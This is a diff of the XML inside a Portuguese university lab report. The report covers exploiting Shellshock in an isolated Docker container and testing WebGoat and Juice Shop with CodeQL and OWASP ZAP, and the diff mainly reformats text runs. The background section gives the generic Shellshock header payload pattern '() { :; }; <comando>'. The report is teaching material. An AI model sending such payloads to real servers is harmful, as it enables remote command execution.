--- a/docs/modulo-2.docx
+++ b/docs/modulo-2.docx
@@ -138,35 +138,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Na primeira parte, foi explorada a vulnerabilidade </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, que afeta versões antigas do interpretador </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>. Através de um ambiente controlado com Docker, foi possível compreender como variáveis de ambiente maliciosas podem ser usadas para executar comandos no servidor remoto, evidenciando a importância da validação de entradas e da atualização de componentes críticos do sistema.</w:t>
+        <w:t>Na primeira parte, foi explorada a vulnerabilidade Shellshock, que afeta versões antigas do interpretador Bash. Através de um ambiente controlado com Docker, foi possível compreender como variáveis de ambiente maliciosas podem ser usadas para executar comandos no servidor remoto, evidenciando a importância da validação de entradas e da atualização de componentes críticos do sistema.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -180,49 +152,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Na segunda parte, foram utilizadas as ferramentas </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e OWASP ZAP para realizar, respetivamente, análise estática (SAST) e análise dinâmica (DAST) de aplicações web vulneráveis. Com o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, analisou-se código-fonte para detetar a presença de credenciais estáticas e compreender o funcionamento dos </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>tokens</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JWT. Com o ZAP, foram realizados testes de </w:t>
+        <w:t xml:space="preserve">Na segunda parte, foram utilizadas as ferramentas CodeQL e OWASP ZAP para realizar, respetivamente, análise estática (SAST) e análise dinâmica (DAST) de aplicações web vulneráveis. Com o CodeQL, analisou-se código-fonte para detetar a presença de credenciais estáticas e compreender o funcionamento dos tokens JWT. Com o ZAP, foram realizados testes de </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -234,69 +164,19 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> na aplicação </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Juice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Shop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>, explorando vulnerabilidades como SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>injection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e cross-site </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>scripting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (XSS).</w:t>
+        <w:t xml:space="preserve"> na aplicação Juice Shop, explorando vulnerabilidades como SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e cross-site scripting (XSS).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -392,49 +272,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">O Docker foi utilizado para criar o ambiente vulnerável necessário à exploração da vulnerabilidade </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>. Através do contentor disponibilizado pelo docente (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>jsimao</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/cs-shellshock-amd64), foi possível executar um servidor Apache com scripts CGI que recorrem a uma versão vulnerável do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>. Esta abordagem garantiu o isolamento do ambiente de testes, evitando qualquer impacto sobre o sistema anfitrião.</w:t>
+        <w:t>O Docker foi utilizado para criar o ambiente vulnerável necessário à exploração da vulnerabilidade Shellshock. Através do contentor disponibilizado pelo docente (jsimao/cs-shellshock-amd64), foi possível executar um servidor Apache com scripts CGI que recorrem a uma versão vulnerável do Bash. Esta abordagem garantiu o isolamento do ambiente de testes, evitando qualquer impacto sobre o sistema anfitrião.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -448,35 +286,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">O servidor foi exposto na porta 8080, permitindo o envio de pedidos HTTP através de ferramentas externas como o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Postman</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ou o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>. Esta configuração facilitou a execução controlada dos ataques e a recolha de evidências.</w:t>
+        <w:t>O servidor foi exposto na porta 8080, permitindo o envio de pedidos HTTP através de ferramentas externas como o Postman ou o curl. Esta configuração facilitou a execução controlada dos ataques e a recolha de evidências.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -505,63 +315,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">O </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Postman</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> foi utilizado para construir e enviar pedidos HTTP personalizados aos scripts CGI do servidor vulnerável. A ferramenta permitiu incluir cabeçalhos específicos, como o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>User-Agent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, e inserir neles o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> responsável por explorar a vulnerabilidade </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Shellshock</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>. Também foi utilizada para visualizar as respostas do servidor e guardar as evidências de cada teste realizado.</w:t>
+        <w:t>O Postman foi utilizado para construir e enviar pedidos HTTP personalizados aos scripts CGI do servidor vulnerável. A ferramenta permitiu incluir cabeçalhos específicos, como o User-Agent, e inserir neles o payload responsável por explorar a vulnerabilidade Shellshock. Também foi utilizada para visualizar as respostas do servidor e guardar as evidências de cada teste realizado.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -583,11 +337,9 @@
         <w:pStyle w:val="Head2"/>
         <w:ind w:left="576" w:hanging="576"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>CodeQL</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -605,29 +357,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Na segunda parte do trabalho, foi utilizada a ferramenta </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para realizar análise estática de código (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Na segunda parte do trabalho, foi utilizada a ferramenta CodeQL para realizar análise estática de código (</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
@@ -637,91 +368,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Static</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Application</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Security</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Testing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – SAST</w:t>
+        <w:t>Static Application Security Testing – SAST</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -730,9 +377,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">). O </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>). O CodeQL permite consultar o código-fonte através de uma linguagem de interrogação baseada em lógica, identificando vulnerabilidades conhecidas e padrões de segurança incorretos.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
@@ -740,67 +386,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>CodeQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> permite consultar o código-fonte através de uma linguagem de interrogação baseada em lógica, identificando vulnerabilidades conhecidas e padrões de segurança incorretos.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:br/>
-        <w:t xml:space="preserve">Foi analisada a aplicação </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>WebGoat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, onde se estudou uma vulnerabilidade relacionada com o uso de credenciais estáticas e a estrutura dos JSON Web </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Tokens</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Linux Libertine O" w:eastAsia="Cambria" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (JWT).</w:t>
+        <w:t>Foi analisada a aplicação WebGoat, onde se estudou uma vulnerabilidade relacionada com o uso de credenciais estáticas e a estrutura dos JSON Web Tokens (JWT).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -823,119 +410,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">O </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Zed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Attack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Proxy (ZAP), desenvolvido pela OWASP, foi a ferramenta principal para a análise dinâmica (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Dynamic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Application</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Security</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Testing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – DAST) da aplicação OWASP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Juice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Shop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>O Zed Attack Proxy (ZAP), desenvolvido pela OWASP, foi a ferramenta principal para a análise dinâmica (Dynamic Application Security Testing – DAST) da aplicação OWASP Juice Shop.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -949,49 +424,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com o ZAP foi possível realizar testes de penetração, como </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>fuzzing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, SQL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>injection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e cross-site </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>scripting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (XSS), simulando o comportamento de um atacante real. A ferramenta também permitiu observar o tráfego entre o cliente e o servidor, facilitando a identificação de pontos de vulnerabilidade e a compreensão do impacto de cada ataque.</w:t>
+        <w:t>Com o ZAP foi possível realizar testes de penetração, como fuzzing, SQL injection e cross-site scripting (XSS), simulando o comportamento de um atacante real. A ferramenta também permitiu observar o tráfego entre o cliente e o servidor, facilitando a identificação de pontos de vulnerabilidade e a compreensão do impacto de cada ataque.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -999,19 +432,9 @@
         <w:pStyle w:val="Head2"/>
         <w:ind w:left="576" w:hanging="576"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ambiente</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Trabalho</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>Ambiente de Trabalho</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1109,19 +532,9 @@
       <w:pPr>
         <w:pStyle w:val="Head2"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Enquadramento</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>técnico</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>Enquadramento técnico</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1138,7 +551,6 @@
         </w:rPr>
         <w:t xml:space="preserve">A vulnerabilidade conhecida como </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -1148,7 +560,6 @@
         </w:rPr>
         <w:t>Shellshock</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -1156,7 +567,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> afeta versões antigas do interpretador </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -1166,63 +576,13 @@
         </w:rPr>
         <w:t>Bash</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e permite que uma </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> com a forma () { :; }; &lt;comando&gt; presente numa variável de ambiente cause a execução de comandos arbitrários quando o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> processa essa variável como uma definição de função. Num servidor Web que use CGI com </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vulnerável, cabeçalhos HTTP (transformados em variáveis de ambiente HTTP_*) podem transportar o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
